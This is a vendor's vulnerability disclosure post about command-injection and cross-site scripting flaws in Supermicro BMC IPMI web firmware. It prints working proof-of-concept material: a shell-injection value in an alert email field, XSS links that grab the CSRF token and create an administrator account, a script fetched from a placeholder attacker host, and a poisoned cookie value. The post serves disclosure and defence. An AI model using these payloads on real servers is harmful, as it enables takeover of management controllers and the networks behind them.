.webp)
Behind the screens: An overview of hidden attack surfaces in powerful BMC chip infrastructure.
The Binarly REsearch team has discovered multiple vulnerabilities in the Supermicro IPMI firmware component developed by ATEN. Vulnerabilities can be exploited by unauthenticated remote attackers and could result in obtaining the root of the BMC system.
Last week, we discussed the remote compromise of the Cisco Catalyst devices: "A Silent Threat in Our Devices: The BlackTech Firmware Attacks". Baseboard Management Controllers (BMC) are another remote attack vector frequently used by attackers to compromise enterprise or data center networks. Such attack scenarios have been discussed by security researchers, used by red teamers, and exploited by threat actors for ages. Unfortunately, according to Binarly REsearch team findings, the state of BMC security on Supermicro servers shows the level of product security practices from early 2000-x and does not meet modern security standards. The attacks we are disclosing show the very low complexity of compromising BMC host OS and gaining enough privileges to deliver a persistent firmware implant to the UEFI BIOS.
All the vulnerabilities disclosed in this blog post are proactively detected by the Binarly Transparency Platform. Comprehensive BMC support is coming later this year.
Baseboard Management Controllers (BMC) are special chips located on the motherboard of servers that are widely used for remote management. With the help of BMC chips, you can monitor hardware indicators such as temperature, set fan speed and even flash the UEFI system firmware of the target server. An interesting fact is that it can work even if the host OS is shut down. These powerful capabilities make these devices attractive targets because once you gain access to the BMC, you usually get access to the whole server, and in some cases even to the entire data center. Given the severity of the problem, the NSA and CISA recently released practical guidance with clear steps to harden BMC systems.
Back in 2013, multiple vulnerabilities related to Supermicro IPMI firmware were publicly documented and patched. The Binarly REsearch team decided to investigate this 10 years later to see how the situation has changed.
For this research, we took firmware for Supermicro X11 version 1.66. As a result, a total of 7 vulnerabilities were discovered, according to Binarly estimates 4 of them with critical-severity and 3 others with high-severity scores. (See Supermicro advisory for patch details).
The first vulnerability (BRLY-023-001) is critical because it allows authenticated attackers to gain root access and completely compromise the BMC system. This privilege allows to make the attack persistent even while the BMC component is rebooted and to move laterally within the compromised infrastructure, infecting other endpoints.
Three other vulnerabilities - BRLY-2023-007, BRLY-2023-008, and BRLY-2023-009 - are also rated critical by CVSS scores because they allow remote, unauthenticated attackers to execute arbitrary JS code in the context of the logged-in BMC user. In this case, an attacker could create an account with administrative privileges for the web server component of the BMC IPMI software. Most importantly, it allows exploitation of vulnerabilities that require authentication, such as BRLY-2023-001. By combining these vulnerabilities, unauthorized remote attackers could gain access to the root of the BMC system.
Three additional bugs - BRLY-2023-010, BRLY-2023-011, BRLY-2023-012 - also allow arbitrary JS code to be executed in the victim's browser, but require additional conditions, such as a specific version of the browser or already poisoned cookie value or local storage item. This makes the attack more difficult, but still has a huge impact.
Typically, BMC devices have a variety of protocols that can be used to communicate with them. This usually includes SSH (or SMASH), IPMI, HTTP/HTTPS, SNMP, WSMAN and others. The attack surface of BMC devices is huge, but during this research we decided to take a closer look at the HTTP/HTTPS web server, because it is the most accessible and most likely method of exploitation for an attacker. The NSA and CISA guidance specifically highlighted the importance of isolating the BMC network from the Internet, but, as of the start of October, 2023, we observed more than 70,000 instances of Supermicro IPMI web interface still publicly available:
(Image source: Shodan scan results)
In such a situation, a potential attacker may use the following exploitation roadmap:
First, it is possible to remotely compromise the BMC system by exploiting vulnerabilities in the Web Server component exposed to the Internet. An attacker can then gain access to the Server’s operating system via legitimate iKVM remote control BMC functionality or by flashing the UEFI of the target system with malicious firmware that allows persistent control of the host OS. From there, nothing prevents an attacker from lateral movement within the internal network, compromising other hosts.
Now let's discuss in detail each identified vulnerability that can be used to perform these types of attacks.
Supermicro BMC IPMI has a feature to send notifications/alerts via email. Users with administrative privileges can configure these notifications using the web interface via Configuration->Alerts and SMTP server settings using Configuration->SMTP menu. As a result of filling out these forms, the requests described below are sent to the backend:
POST /cgi/op.cgi HTTP/1.1
Host: 192.168.0.8
Cookie: SID=pm0Rz8aNwnr3TP3
Csrf_token: 2WrgyhZHTAJ/bHJlIhwstMAOlT7kK4WkhfcU7dLL6io
Content-Length: 110
...
op=config_alert&destination=192.168.0.10&severity=2&mail=admin@binarly.io&sub=test&msg=test&index=0&fun=m&_=
POST /cgi/op.cgi HTTP/1.1
Host: 192.168.0.8
Cookie: SID=pm0Rz8aNwnr3TP3
Csrf_token: 2WrgyhZHTAJ/bHJlIhwstMAOlT7kK4WkhfcU7dLL6io
Content-Length: 127
...
op=config_smtp&auth_en=on&smtpSSL_en=off&smtpaddr=192.168.0.15&smtpport=587&user=test&pwd=test&sender=bmc-alert@binarly.io&_=
On the server side, these values are stored and then used to send emails when notification/alert conditions are met. This process can also be triggered manually by selecting the created alert and clicking Send Test Alert button in the Configuration->Alerts menu, or directly with this request:
POST /cgi/op.cgi HTTP/1.1
Host: 192.168.0.8
Cookie: SID=pm0Rz8aNwnr3TP3
Csrf_token: 2WrgyhZHTAJ/bHJlIhwstMAOlT7kK4WkhfcU7dLL6io
Content-Length: 29
...
op=send_test_alert&index=0&_=As a result, the code located at offset 0x7F648 in the libipmi.so binary is executed:
First, shell command is constructed using the hardcoded msmtp_path and msg_path values, as well as other variables, which are user-controlled parameters provided through the previously mentioned requests. The result will vary depending on whether the user specified a username/password for SMTP server or not. This command will then be printed to the console and passed to the do_popen function, where it will be executed using glibc popen. The user-supplied smtpaddr, port, user, pwd and sender values used in building shell commands are checked for bad inputs on the server side, which prevents command injection. But mail parameter is not properly validated, so exploitation is possible with such a request:
POST /cgi/op.cgi HTTP/1.1
Host: 192.168.0.8
Cookie: SID=pm0Rz8aNwnr3TP3
Csrf_token: 2WrgyhZHTAJ/bHJlIhwstMAOlT7kK4WkhfcU7dLL6io
Content-Length: 138
...
op=config_alert&destination=192.168.0.10&severity=2&mail=admin@binarly.io;echo%20BRLY%20>/tmp/poc;cat&sub=test&msg=test&index=0&fun=m&_=
And eventually this command will be executed:
/bin/msmtp --host=192.168.0.15 --port=587 --timeout=10 --auth=login --user=test --passwordeval='echo test' --from=bmc-alert@binarly.io admin@binarly.io;echo BRLY >/tmp/poc;cat < /tmp/pef.txt 2>&1
It is worth noting that this command will be executed as the root user. This is one of the main problems with BMC and other IoT and xIoT devices where root is typically used to run all components of the system.
This vulnerability was resolved by adding an additional check for the user controlled mail parameter in the cgilib_config_alert function by first checking the supplied value for bad characters (&;`'\"|*?~<>^()[]{}$\n\r \) in the EscapeShellCmd function and then matching email address with defined regular expression:
The interesting fact is that the same fixed code pattern exists in the firmware of another Supermicro product (X11 with AST2500 chip). According to meta-information, it was built on 27.10.2022, more than 6 months before BRLY-2023-001 was reported to the Supermicro PSIRT team. This once again demonstrates the complexity of the supply chain ecosystem.
The CVSS severity score calculation for BRLY-2023-001 is different (the Scope is changed) from the Supermicro PSIRT team due to the fact that BMC Web UI allows the user to control just the target server OS, not the BMC OS itself. Even a user with administrative access to the Web UI cannot manage the BMC system.
However, exploitation of this vulnerability provides full access to the BMC OS, governed by a different authorization scope, and, as a result, allows arbitrary code execution as root user, system availability manipulation, etc.
As a result, Binarly calculated CVSS – 9.1 Critical, Supermicro PSIRT – 7.2 High.
All of these issues are DOM-based Cross-Site Scripting (XSS) vulnerabilities, where untrusted user input is passed into the sink, such as innerHTML or eval(). As a result an unauthenticated remote attacker can impersonate the victim user and perform actions on the user’s behalf.
The BRLY-2023-007, BRLY-2023-008 and BRLY-2023-009 issues are very similar with the only difference of request’s exploitable GET parameter (index, pdomain and port respectively). Here is the code of config_ip_ctrl_change HTML page vulnerable to BRLY-2023-007, where user input is passed directly to the innerHTML property of ruleno element without any sanitization:
function PageInit()
{
...
index_var = GetVars("index");
...
ruleno_obj = document.getElementById("ruleno");
...
ruleno_obj.innerHTML = index_var;
...
}
function GetVars (str)
{
url = location.search;
var parameterList = url.split ("&");
for (var i = 0; i < parameterList.length; i++) {
parameter = parameterList[i].split ("=");
if (parameter[0] == str) {
return (decodeURIComponent (parameter[1]));
}
}
}For example, to create an administrator account with username BRLY and password BRLYBRLY using this vulnerability, an attacker can trick an authenticated user with administrative privileges to open the following link in a web browser:
https://192.168.0.8:443/cgi/url_redirect.cgi?url_name=config_ip_ctrl_change&index=%3Cimg%20src%3d1%20onerror%3d'var csrfRegex%3d/CSRF_TOKEN", "([^"]*?)"/g;var csrfMatch%3dcsrfRegex.exec(document.body.innerHTML);var csrf%3dcsrfMatch[1];fetch("https://192.168.0.8:443/cgi/op.cgi",{method:"POST",headers:{"Csrf_token":csrf},body:"op%3dconfig_user%26username%3dBRLY%26original_username%3d2%26password%3dBRLYBRLY%26new_privilege%3d4%26_%3d"})'%3E
Here, the onerror event is used to execute JavaScript code when the browser tries to download a non-existenting image. The JS code first obtains the user's CSRF token and then uses it to make a POST request in order to create a user with administrative privileges and credentials defined by the attacker.
The difference with BRLY-2023-010 is that its exploitation requires the victim to use IE11 or Microsoft Edge in Internet Explorer mode, since in this case the attack vector is the hash property of the URL, which is exploitable only in such an environment:
function PageInit() {
...
var param1 = window.location.hash.split("#");
if (param1[1].length != 0) {
var param2 = param1[1].split(",");
if (param2[0].length != 0 && param2[1].length != 0) {
ctrl_idx = param2[0];
max_api_row_size = param2[1];
document.getElementById("devinfo").innerHTML =
"Device" + ctrl_idx + ": Unconfigured good drive";
GetPhysicalHDDInfo(ctrl_idx);
}
} else {
location.href = "../cgi/url_redirect.cgi?url_name=servh_storage";
}
}This code is from the servh_storage_create HTML page, for the servh_storage_add it is similar.
To create an administrator account with username BRLY and password BRLYBRLY an attacker can trick an authenticated user with administrative privileges to open the following link in a web browser:
https://192.168.0.8:443/cgi/url_redirect.cgi?url_name=servh_storage_create#<img src=1 onerror='document.write("<script src=\"https://{ATTACKER_HOST}/payload.js\"></script>")'>,2
Where https://{ATTACKER_HOST}/payload.js is an address of hosted malicious JS like this:
var ajaxRequest = new XMLHttpRequest();
var csrfRegex = /CSRF_TOKEN", "([^"]*?)"/g;
ajaxRequest.open("GET", "/cgi/url_redirect.cgi?url_name=topmenu", false);
ajaxRequest.send();
var csrfMatch = csrfRegex.exec(ajaxRequest.responseText);
var csrf = csrfMatch[1];
var params =
"op=config_user&username=BRLY&original_username=2&password=BRLYBRLY&new_privilege=4&_=";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", "/cgi/op.cgi", true);
ajaxRequest.setRequestHeader("Csrf_token", csrf);
ajaxRequest.send(params);
Our CVSS score calculations for BRLY-2023-007, BRLY-2023-008 and BRLY-2023-009 are different (the Attack Complexity is Low) from the Supermicro PSIRT team since we assume that the attacker knows the IP address of the BMC web server. In fact, it is very easy to fingerprint them because in many cases they are exposed to the Internet, according to Shodan scan results. We also assume that the attacker knows the administrator's email address to send a phishing email (this is just an example, there are many other ways to trick a user into opening a malicious link). In such a case, an attacker can expect repeatable success because there are no special conditions to prevent this attack. Required actions from the user are already taken into account in the "User Interaction" metric. This fact makes the Attack Complexity: Low.
As a result, Binarly calculated CVSS – 9.6 Critical, Supermicro PSIRT – 8.3 High.
This class of XSS allows an attacker to execute malicious code every time a specific action is triggered, such as when a user refreshes a page or uses certain functionality.In the case of BRLY-2023-011, the following vulnerable code was located across multiple HTML pages:
lang_setting = ReadCookie("language");
if (lang_setting == null) {
CreateCookie("langSetFlag", "0");
CreateCookie("language", "English");
lang_setting = "English";
}
document.write(
'<script type="text/javascript", src = "../js/lang/' +
lang_setting +
'/lang_str.js"></script>'
);Here the language cookie value is passed into the lang_setting variable which is then used to construct a JavaScript code that will be included in the page using the document.write() function without any sanitization.
To exploit it, an attacker can poison the language cookie of an authenticated user session with administrative privileges with the following value:
language=English/lang_str.js"></script><script src="https://{ATTACKER_HOST}/payload.js"></script><script src="
For BRLY-2023-012, the attack vector is a lang local storage item. This is the code from nav_ui.js script, loaded by man_ikvm_html5_bootstrap and man_ikvm_html5_bootstrap_vm webpages:
...
var sel = WebUtil.readSetting("lang", "en");
...
change_ui_lang(sel);
...
WebUtil.readSetting = function (name, defaultValue) {
"use strict";
var value;
if (window.chrome && window.chrome.storage) {
value = WebUtil.settings[name];
} else {
value = localStorage.getItem(name);
}
if (typeof value === "undefined") {
value = null;
}
if (value === null && typeof defaultValue !== undefined) {
return defaultValue;
} else {
return value;
}
};
function change_ui_lang(v) {
...
var lang = eval(v + "_lang");
...The problem here is that the value of lang local storage item is passed directly to the eval() JavaScript function.
Exploitation of both BRLY-2023-011 and BRLY-2023-012 requires some initial access that can be achieved by exploiting the previously mentioned Reflected Cross-Site Scripting vulnerabilities. The advantage here is that Stored XSS vulnerabilities make this attack persistent. To terminate the exploitation, additional steps are required to clear the cookie/local storage value.
Our CVSS score calculation for BRLY-2023-011 and BRLY-2023-012 is different (Attack Vector: Local, Attack Complexity: Low) from the Supermicro PSIRT team because reading/modifying of user cookies/local storage items requires already obtained local access. And in this case, complexity of such an attack is low, since no circumstances prevent successful exploitation in certain configurations.
As a result, Binarly calculated CVSS – 8.6 High, Supermicro PSIRT – 8.3 High.
Baseboard Management Controllers (BMCs) are powerful systems whose security is a high-priority given the level of their capabilities. Unfortunately, as usually happens during the disclosure process, the vendor tried to reduce the final impact of the documented vulnerabilities. We believe this to be an extremely wrong position, since end customers will have incorrect information when assessing the severity of a particular update. We encourage system administrators to keep their BMC systems up to date and follow NSA and CISA hardening guidelines.
Contact us to learn more about how we can help your organization build a robust plan for addressing these risks.
.svg)
